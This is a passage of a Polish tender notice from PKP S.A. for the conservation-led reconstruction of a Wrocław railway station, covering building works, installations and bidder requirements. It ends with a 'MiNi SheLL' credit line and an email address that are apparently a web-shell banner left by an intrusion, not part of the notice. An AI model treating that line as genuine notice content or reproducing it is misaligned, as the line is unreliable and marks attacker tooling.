Dachy dwuspadowe pokryte dachówką o konstrukcji drewnianej, w głównej części budynku oraz w jego jednokondygnacyjnej części, są w dobrym stanie technicznym. Niemniej należy dokonać naprawy lub wymiany skorodowanych elementów drewnianych stropu poddasza, by odtworzyć układ statyczny więźby dachowej. W części parterowej po lewej stronie  zawilgocenie konstrukcji dachu oraz  zniszczenie przekrycia. 
Na dachu należy uzupełnić płotki śniegowe oraz stopnie ław kominiarskich.
1.3.10. WYKOŃCZENIE OBIEKTU - ELEWACJE 
Elewacje budynku są w złym stanie technicznym. Należy usunąć graffiti na elewacjach oraz uzupełnić ubytki wypraw tynkarskich oraz malarskich. Elewacje należy oczyścić z luźnych wypraw tynkarskich, następnie wykonać nowe tynkowanie i malowanie. Należy wykonać również izolację przeciwwilgociową ścian fundamentowych. Stolarkę okienną i drzwiowa należy wymienić. 
Występujące na elewacjach oświetlenie zewnętrzne jest w złym stanie. Należy je wymienić i dobrać odpowiednie - elewacyjne. Należy wymienić tablice informacyjne dworcowe. Należy zlikwidować okablowanie występujące na budynku i nowe poprowadzić w bruzdach ścian. Należy zdemontować wszelkie kraty okienne.
2. INSTALACJE 
2.1. INSTALACJA CENTRALNEGO OGRZEWANIA. 
Instalacja c.o. wodna, pompowa, dwururowa o parametrach 80/60oC zasilana z nowoprojektowanej kotłowni. Rozprowadzenie poziomów, pionów c.o i podejść do grzejników - należy wykonać w bruzdach ściennych. Grzejniki płytowe z podejściami (od ściany). Każdy grzejnik wyposażony w zawory termostatyczne z głowicą termostatyczną z zabezpieczeniem antykradzieżowym. Rury c.o. wielowarstwowe typu PEX-AL.-PEX. 
2.2. KOTŁOWNIA OPAŁOWA NA (EKO GROSZEK)
W projekcie ujęto budowę kotłowni opałowej opartej o kocioł z ciągłym podawaniem paliwa, przystosowany do spalania (eko-groszku). Zastosowano w nim mechaniczny palnik retortowy w połączeniu ze stalowym wymiennikiem ciepła. Paliwo gromadzone będzie w wydzielonym pomieszczeniu obok pomieszczenia kotłowni. Niezbędne jest wydzielenie budowlane powierzchni magazynowej na opał, kosztem ograniczenia powierzchni przeznaczonej na cele komercyjne. Dostawa paliwa do kotła - z zasobnika przykotłowego przy użyciu podajnika ślimakowego. Zasyp do zasobnika przykotłowego - ręczny. Napełnianie paliwem z magazynu węgla - ręczne, przez obsługę kotłowni. 
2.3. INSTALACJA WODOCIĄGOWA. 
Projektuje się wykonanie instalacji zimnej i ciepłej wody z rur wielowarstwowych np. typu PEX-AL.-PEX. Rozprowadzenie przewodów do przyborów w bruzdach ściennych. W zakres wchodzi również wymiana pionów zasilających mieszkania znajdujące się nad pomieszczeniami dworca. 
Zabezpieczenie ciepłej wody użytkowej nastąpi w oparciu o nowoprojektowaną kotłownię. 
2.4. INSTALACJA KANALIZACYJNA. 
Projektuje się wykonanie kanalizacji z rur kielichowych z pvc łączonych na uszczelki gumowe. Podejścia do przyborów biegnące nad posadzką, ze względów estetycznych należy umieścić w zakrytych bruzdach ściennych. W zakres projektu wchodzi również wymiana pionów kanalizacyjnych wpiętych do istniejącej kanalizacji podposadzkowej. Piony główne wentylowane będą wywiewkami ponad dachem. Wywiewki - producenta rur. W sanitariatach z pisuarem - kratki ściekowe z pvc z kratką ze stali nierdzewnej oraz syfonem.
2.5. WENTYLACJA 
Projektuje się pozostawienie wentylacji grawitacyjnej jako przewodniej. Planuje się wymianę wszystkich kratek oraz kanałów wentylacyjnych. Kanały wykonać z blachy ocynkowanej. W poszczególnych pomieszczeniach projektuje się wentylatory systemowe. Zaprojektowano również wentylację mechaniczną jako wspomagającą - wg opracowania projektu instalacji sanitarnych. 
W części sanitariatów dla podróżnych należy zdemontować według projektu komin wentylacyjny. W parterowej części komercyjnej projektuje się 3 nowe kominy.
3. LOKALIZACJA ORAZ STAN ISTNIEJĄCY
3.1. LOKALIZACJA I STRUKTURA WŁASNOŚCIOWA 
Budynek dworca jest usytuowany we Wrocławiu na działce o nr 24, AM-3, obręb Gądów Mały, Miasto Wrocław, przy ulicy Metalowców 61. Właścicielem działki jest skarb Państwa. Inwestor jest wieczystym użytkownikiem terenu objętego opracowaniem. Na terenie działki znajduje się również budynek mieszkalny 3 kondygnacyjny. 
3.2. WYZNACZNIKI ROZWIĄZANIA PRZESTRZENNEGO 
Obszar objęty opracowaniem projektowym stanowi działkę o numerze ewidencyjnym: 24, AM-3, obręb Gądów Mały, Miasto Wrocław. Na działce oprócz budynku stacji znajduje się również budynek mieszkalny oraz tory kolejowe. 
Wytyczne do projektu przebudowy obiektu zostały ustalone  przez Konserwatora i obejmują zaakceptowane i ujęte w zaopiniowanych u Miejskiego Konserwatora Zabytków projektach autorstwa Biura Inżynierskiego
Tomasz Jaworski z lutego 2008 r., z uwagą:
- nie dopuszcza się rozbiórki wschodniej części dworca, powinna zostać ona przebudowana z dostosowaniem do nowej funkcji np. handlowej, - projektuje się odbudowę tej części budynku z przeznaczeniem na cele komercyjne, 
- drzwi wejściowe do dworca, od strony ulicy i od strony peronu, należy przywrócić na zamknięte łukiem odcinkowym - zaprojektowano przywrócenie na zamknięte łukiem odcinkowym 
- przywrócenie pierwotnego układu funkcjonalnego i komunikacyjnego na parterze dworca: udostępnienie holu z okienkami kas spółek kolejowych - układ został przywrócony 
- zabudowa zegara kolejowego na elewacji południowej w miejscu historycznym - zaprojektowano zegar na południowej elewacji 
- w przypadku wymiany cegły szkliwionej w tunelu, należy wymienić ją na taką samą - projektuje się wymianę cegły szkliwionej na taką samą w części tunelu objętej opracowaniem Zgodnie z pierwotnym przeznaczeniem budynek będzie pełnić funkcję dworca. Niezbędne jest przeprowadzenie przebudowy wnętrza jak również elewacji. Należy przywrócić drewniane okiennice oraz wymienić okna na drewniane energooszczędne. Drzwi do poczekalni i na peron należy odrestaurować. 
Należy wyburzyć zamurowania nad drzwiami wejściowymi, przywracając łukowe nadproże. Wymienić stolarkę drzwi na dostosowana do łukowego naświetla. 
W części głównej budynku projektuje się zachować istniejącą konstrukcję ścian nośnych, stropów i zadaszenia. W części bocznej projektuje się odbudować zniszczone zadaszenie. Wymiary otworów drzwiowych muszą zostać doprowadzone do zgodności z dzisiejszymi przepisami. Istniejące instalacje wewnętrzne jako nie spełniające wymogów planuje się wymienić na nowe. 
Odtworzenia i uzupełnienia wymagają detale elewacyjne w całości zachowane na budynku takie jak gzymsy. Projektuje się wymienić orynnowanie. Obce elementy na elewacji takie jak kraty stalowe w oknach, należy usunąć. 
We wnętrzu budynku niezbędne jest przebudowanie wszystkich pomieszczeń oraz odbudowa klatki schodowej. Na elewacji południowej należy umieścić zegar ścienny. Wejście do klatki schodowej prowadzącej do mieszkalnej części budynku, jest umieszczone w drewnianym podcieniu, który uległ częściowemu zniszczeniu i zabudowaniu. Drewnianą konstrukcje należy odtworzyć, zdzierając istniejącą farbę, następnie zaimpregnować przeciwpożarowo, przeciw owadom i grzybom. Odtworzyć dawny wygląd podcienia. 
3.3. PROGRAM KUBATUROWY 
Powierzchnia zabudowy - 386,08 m2
Powierzchnia zabudowy wraz z budynkiem mieszkalnym - 515,64 m2 
Powierzchnie utwardzone - 205,83 m2
Powierzchnia terenów zielonych istniejących - 425,78 m2 
Powierzchnie projektowane: 
Projektowane powierzchnie ażurowe - 132,
IV. Materiały Zamawiającego i działania realizowane przez Zamawiającego
Na zlecenie Zamawiającego wykonana została dokumentacja projektowa (projekty budowlane i wykonawcze).  Projekty budowlane i wykonawcze   zostanąprzekazane Wykonawcy po zawarciu Umowy.                                                                      
pnkt V-VI-VII zgodnie ze SIWZ ze względu na ograniczoną ilość znaków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.45.41.00-5, 45.30.00.00-0, 45.40.00.00-1, 45.11.00.00-1, 45.11.12.00-0, 45.11.12.20-6, 45.11.12.40-2, 45.11.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 196.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający wymaga wniesienie wadium w wysokości 80 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej dwa  zamówienia polegające na realizacji robót budowlano-montażowych, na obiekcie budowlanym w postaci budynku użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.)  o kubaturze nie mniejszej niż 2500m3  wyposażonym, co najmniej w instalacje i systemy łącznie: instalacje sanitarne (w tym co najmniej: wod-kan, c.o. ccw. wentylacja i oddymianie), sieci i instalacje teletechniczne (w tym co najmniej sieć przewodowa LAN, łączność telefonii kablowej, dźwiękowy system ostrzegawczy, instalacja monitoringu wizyjnego, instalacja przeciwpożarowa, instalacja informacji wizualnej), instalacja wentylacji mechanicznej i oddymiania, sieci i instalacje elektryczne i elektroenergetyczne o łącznej wartości  robót budowlano-montażowych nie mniejszej niż 2.500.000 złotych brutto lub równowartość w innych walutach, oraz  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedno  zamówienie polegające na realizacji robót budowlano-montażowych na obiekcie wpisanym do rejestru zabytków o wartości robót budowlano-montażowych nie mniejszej niż 1.500.000 PLN brutto lub równowartość w innych walutach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować Personelem do wykonania 
przedmiotu  Zamówienia , który  składa się na kluczowy zespół ekspertów, zgodnie z poniższym wyszczególnieniem:
Eksperci:
-	Kierownik Budowy powinien posiadać wyższe wykształcenie techniczne, przynajmniej 5-letnie doświadczenie na stanowiskach kierowniczych, przy realizacji robót budowlano-montażowych na obiekcie użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.), a także uprawnienia do kierowania budową i robotami oraz nadzorowania i kontrolowania robót w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodnie z wymaganiami ustawy Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118, z późn. zmianami) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 ze zm.) łącznie z uprawnieniami do wykonywania nadzoru inwestorskiego przy zabytkach nieruchomych - określonymi w Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. z 2004r. Nr 150 poz. 1579) oraz praca przy co najmniej 2-ch obiektach budowlanych  wpisanych do rejestru zabytków.
-	Specjalista ds. wycen kosztorysowych i rozliczenia rzeczowo - finansowego inwestycji oraz przygotowania raportów okresowych, powinien posiadać wyższe wykształcenie oraz 3-letnie doświadczenie w przygotowywaniu i weryfikacji kosztorysów oraz znajomość rozliczeń rzeczowo - finansowych inwestycji budowlanych.
-	Specjalista ds. geodezji - powinien posiadać co najmniej średnie wykształcenie na odpowiednim kierunku, uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji w zakresie geodezyjnej obsługi inwestycji jak też geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i  inwentaryzacyjnych oraz co najmniej 3-letnie doświadczenie zawodowe
-	Specjalista ds. geotechniki - powinien posiadać wyższe wykształcenie na odpowiednim kierunku, stwierdzone kwalifikacje do wykonywania i kierowania pracami geologicznymi w zakresie ustalania warunków geologiczno-inżynierskich dla potrzeb zagospodarowania przestrzennego i posadawiania obiektów budowlanych, z wyłączeniem posadawiania obiektów budowlanych zakładów górniczych oraz budownictwa wodnego oraz co najmniej 3-letnie doświadczenie zawodowe. 
-	Specjalista ds. obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń - powinien posiadać wyższe wykształcenie i  co najmniej 3- letnie doświadczenie zawodowe w wykonywaniu obmiarów i odbiorów dostaw materiałów, prefabrykatów i urządzeń
-	Specjalista ds. teleinformatyki -  powinien mieć wyższe wykształcenie, co najmniej 3-cio letnie doświadczenie w budowie lokalnych sieci komputerowych opartych na systemie okablowania strukturalnego i systemie instalacyjnym, posiadającym elementy aktywne do sterowania i zarządzania siecią LAN oraz rozległej sieci komputerowej WAN.
-	Specjalista ds. systemów bezpieczeństwa (np. kontroli dostępu, sygnalizacji włamania, sygnalizacji pożaru, nagłośnienia awaryjnego i informacyjnego,...) - powinien mieć co najmniej średnie wykształcenie techniczne i co najmniej 3 letnie doświadczenie zawodowe w budowie systemów bezpieczeństwa.


- Rzeczoznawca ds. zabezpieczeń przeciwpożarowych
- Rzeczoznawca ds. konstrukcyjno - budowlanych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż       2 000 000 złotych lub równowartość w innych walutach
2)posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem niniejszego  zamówienia na kwotę nie mniejszą niż 2.000.000 złotych lub równowartość w innych walutach (w tym na jedno zdarzenie nie mniej niż  250.000 złotych lub równowartość w innych walutach).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pkp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 10:30, miejsce: PKP S.A. Oddział Gospodarowania Nieruchomościami we Wrocławiu ul. Joannitów 13, 50-525 Wrocław pok. 305..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Irena Dulska tel. 71-717-53-34, i.dulska@pkp.pl,  Józef Wojnarowicz te. 71-717-11-04, j.wojnarowicz@pkp.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com